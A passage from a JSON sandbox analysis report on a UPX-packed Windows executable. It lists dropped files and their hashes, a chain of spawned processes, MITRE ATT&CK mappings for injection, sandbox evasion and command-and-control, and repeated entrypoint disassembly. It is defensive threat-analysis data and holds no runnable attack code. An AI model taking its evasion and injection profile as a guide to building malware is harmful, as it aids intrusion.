"file_size": 355151, "sha256": "7172b41be8ca98d83485164d736db26e945f9a53ddabe3e64390cb53d46b4feb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82488.exe", "file_size": 355131, "sha256": "37ee7bc7f779b5ced7a8403e1b5ae30e7dffc2cbc06d3ae96470e197cf0c2426", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04226.exe", "file_size": 355111, "sha256": "04ffef0277c6adf70e960d8983bf13c604289e984ea365ccc34c2f3db2243495", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004044", "name": "f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe", "normalized_path": "C:\\f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe", "sha256": "f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2"}, {"uid": "00000000-00004544", "parentuid": "00000000-00004044", "name": "lpdvdhr.exe", "normalized_path": "c:\\lpdvdhr.exe", "sha256": "44f8e1cfa8c028d992a595d34f7bfdee261a5d6d954b377e12323b133c4e91e9"}, {"uid": "00000000-00005960", "parentuid": "00000000-00004544", "name": "nrtffvl.exe", "normalized_path": "c:\\nrtffvl.exe", "sha256": "b3a4e530fba13f316d692afe47540e07adc403f656aa9202eb53e37aac140028"}, {"uid": "00000000-00002192", "parentuid": "00000000-00005960", "name": "npltvpp.exe", "normalized_path": "c:\\npltvpp.exe", "sha256": "e0261c6bd9fde6dcf68e8424692e53839548022194fa347a59d66ed605405a5d"}, {"uid": "00000000-00003448", "parentuid": "00000000-00002192", "name": "llxjdlf.exe", "normalized_path": "c:\\llxjdlf.exe", "sha256": "d00e2f1d10f51fde56d87889d9a7e5da0c4bf7e6fe760d036e8392c2e71ef036"}, {"uid": "00000000-00003228", "parentuid": "00000000-00003448", "name": "rxrfxtr.exe", "normalized_path": "c:\\rxrfxtr.exe", "sha256": "6deda608112fc216c70be43779321413957342d5264e4be5ceee27d7c08d150b"}, {"uid": "00000000-00003612", "parentuid": "00000000-00003228", "name": "xhbff.exe", "normalized_path": "c:\\xhbff.exe", "sha256": "e5003a6c4c4be0344b503b9f9c426ccdd2a5106f0a8a3719d4b45cf7d61886df"}, {"uid": "00000000-00003168", "parentuid": "00000000-00003612", "name": "vhppv.exe", "normalized_path": "c:\\vhppv.exe", "sha256": "02c0dd549090f441e8bd44da92ca538c51e61c17df4eec5def1be88d2d07ca83"}, {"uid": "00000000-00003468", "parentuid": "00000000-00003168", "name": "hfbrlh.exe", "normalized_path": "c:\\hfbrlh.exe", "sha256": "e6b80fdbc969f494fc553db4f16d7ee9b7faf441440d0410451a07a5b8f05d6b"}, {"uid": "00000000-00003860", "parentuid": "00000000-00003468", "name": "brftth.exe", "normalized_path": "c:\\brftth.exe", "sha256": "0391e2d2c8dfb1ae67857272a19583269725860e3427b926395a53d87115ba40"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4644224.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"62424.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"20082.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xxvjvfv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rpfxpvf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"66262.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6820002.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"020066.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fjjxl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"82488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"04226.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"240402.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2406002.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"drppx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xtrhlt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pfrdl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xfvdbnh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"blvvjn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fvbpf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ntpjj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"644880.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"824246.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"02486.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"66842.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4644224.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"62424.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"20082.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xxvjvfv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rpfxpvf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"66262.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6820002.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"020066.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fjjxl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"82488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"04226.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"240402.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2406002.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"drppx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xtrhlt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pfrdl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n 